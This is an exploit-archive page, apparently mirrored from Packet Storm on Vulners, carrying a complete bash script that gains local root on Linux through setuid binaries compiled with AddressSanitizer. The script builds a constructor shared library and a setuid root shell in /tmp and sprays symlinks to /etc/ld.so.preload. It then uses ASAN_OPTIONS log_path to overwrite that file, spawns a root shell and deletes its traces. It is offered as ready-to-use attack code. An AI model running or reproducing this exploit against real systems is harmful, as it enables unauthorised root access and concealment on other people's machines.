Lucene search
K

ASAN/SUID Local Root Exploit

🗓️ 29 Feb 2016 00:00:00Reported by infodoxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

ASAN/SUID Local Root Exploit to gain root access by exploiting unsanitary ASAN. Uses LD_PRELOAD overwrite

Code
`#!/bin/bash  
# unsanitary.sh - ASAN/SUID Local Root Exploit  
# Exploits er, unsanitized env var passing in ASAN  
# which leads to file clobbering as root when executing  
# setuid root binaries compiled with ASAN.  
# Uses an overwrite of /etc/ld.so.preload to get root on  
# a vulnerable system. Supply your own target binary to  
# use for exploitation.  
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363  
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk  
# Released under the Snitches Get Stitches Public Licence.  
# Gr33tz to everyone in #lizardhq and elsewhere <3  
# ~infodox (18/02/2016)  
# FREE LAURI LOVE!  
echo "Unsanitary - ASAN/SUID Local Root Exploit ~infodox (2016)"  
if [[ $# -eq 0 ]] ; then  
echo "use: $0 /full/path/to/targetbin"  
echo "where targetbin is setuid root and compiled w/ ASAN"  
exit 0  
fi  
echo "[+] First, we create our shell and library..."  
cat << EOF > /tmp/libhax.c  
#include <stdio.h>  
#include <sys/types.h>  
#include <unistd.h>  
__attribute__ ((__constructor__))  
void dropshell(void){  
chown("/tmp/rootshell", 0, 0);  
chmod("/tmp/rootshell", 04755);  
unlink("/etc/ld.so.preload");  
printf("[+] done!\n");  
}  
EOF  
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c  
rm -f /tmp/libhax.c  
cat << EOF > /tmp/rootshell.c  
#include <stdio.h>  
int main(void){  
setuid(0);  
setgid(0);  
seteuid(0);  
setegid(0);  
execvp("/bin/sh", NULL, NULL);  
}  
EOF  
gcc -o /tmp/rootshell /tmp/rootshell.c  
rm -f /tmp/rootshell.c  
echo "[+] Now we drop our python symlink spraying tool..."  
cat << EOF > sym.py  
#!/usr/bin/python  
import os  
curpid=os.getpid()  
print curpid  
for x in range(0,100):  
newpid=curpid+x  
boom = "foo.%s" %(str(newpid))  
os.symlink("/etc/ld.so.preload", boom)  
EOF  
echo "[+] Spraying dir with symlinks..."  
python sym.py  
echo "[+] Hack the planet!"  
ASAN_OPTIONS='suppressions="/hacktheplanet  
/tmp/libhax.so  
hacktheplanet" log_path=./foo verbosity=1' $1 >/dev/null 2>&1  
$1 >/dev/null 2>&1  
echo "[+] Tidy up a bit..."  
rm -f foo*  
rm -f sym.py  
rm -f /tmp/libhax.so  
echo "[<3] :PPpPpPpOpr000000t!"  
/tmp/rootshell  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Feb 2016 00:00Current
0.1Low risk
Vulners AI Score0.1
26